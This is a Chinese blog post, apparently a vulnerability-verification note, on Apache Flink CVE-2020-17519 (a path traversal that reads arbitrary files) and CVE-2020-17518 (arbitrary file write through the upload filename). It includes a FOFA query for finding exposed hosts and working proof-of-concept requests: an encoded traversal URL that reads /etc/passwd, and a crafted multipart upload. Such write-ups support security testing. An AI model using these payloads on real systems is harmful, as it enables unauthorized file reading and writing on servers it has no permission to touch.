zoukankan      html  css  js  c++  java
  • Apache Flink CVE-2020-17518 & CVE-2020-17519

    CVE-2020-17519 jobmanager/logs路径遍历

    介绍

    Apache Flink 1.11.0中引入的更改(以及1.11.1和1.11.2中也发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

    影响版本

    1.11.0
    1.11.1
    1.11.2

    FOFA

    app=”APACHE-Flink”

    漏洞验证

    POC:

    http://example/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
    1

    1


    CVE-2020-17518 上传路径遍历

    介绍

    Apache Flink 1.5.1引入了REST处理程序,该处理程序允许您通过经过恶意修改的HTTP HEADER将上传的文件写入本地文件系统上的任意位置。

    影响版本

    1.5.1-1.11.2

    FOFA

    app=”APACHE-Flink”

    漏洞验证

    POC:

    POST /jars/upload HTTP/1.1
    Host: localhost:8081
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Connection: close
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
    Content-Length: 187
    
    ------WebKitFormBoundaryoZ8meKnrrso89R6Y
    Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"
    
    success
    ------WebKitFormBoundaryoZ8meKnrrso89R6Y--

    2


    通过上面的路径遍历可知文件写入成功:
    3

    参考链接

    https://github.com/vulhub/vulhub

  • 相关阅读:
    UVa 839 -- Not so Mobile(树的递归输入)
    UVa 548 -- Tree
    UVA 122 -- Trees on the level (二叉树 BFS)
    UVa679 小球下落(树)
    POJ 2255 -- Tree Recovery
    POJ 1451 -- T9
    POJ 2513 -- Colored Sticks
    STL -- heap结构及算法
    nginx利用try_files实现多个源
    nginx location的优先级
  • 原文地址:https://www.cnblogs.com/2rsh0u/p/14240854.html
Copyright © 2011-2022 走看看